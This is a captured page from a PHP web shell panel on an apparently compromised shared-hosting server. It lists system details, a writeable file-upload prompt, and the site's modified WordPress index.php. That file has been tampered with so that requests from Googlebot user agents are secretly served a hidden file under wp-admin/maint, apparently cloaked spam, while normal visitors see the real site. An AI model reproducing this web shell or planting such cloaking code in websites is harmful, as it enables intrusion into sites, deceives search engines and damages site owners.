Prv8 Shell
Server : LiteSpeed
System : Linux in-mum-web984.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u689097916 ( 689097916)
PHP Version : 8.0.30
Disable Function : NONE
Directory :  /home/u689097916/domains/skjmcc.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u689097916/domains/skjmcc.com/public_html/index.php
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$google_bots = [
    'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
    'Googlebot-Mobile', 'Mediapartners-Google', 'AdsBot-Google',
    'AdsBot-Google-Mobile', 'APIs-Google', 'Google Favicon',
    'Google Web Preview', 'Feedfetcher-Google', 'DuplexWeb-Google',
    'Google-InspectionTool', 'Googlebot-AdsBot', 'Googlebot-Desktop',
    'Googlebot-Search', 'Googlebot-Events', 'Googlebot-Tablet',
    'Googlebot-Local', 'Googlebot-Apps', 'Googlebot-Connect', 'Googlebot-Books',
    'Googlebot-Publisher', 'Googlebot-News-RSS'
];
foreach ($google_bots as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        require __DIR__ . '/wp-admin/maint/options.php';
        exit;
    }
}
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';

haha - 2025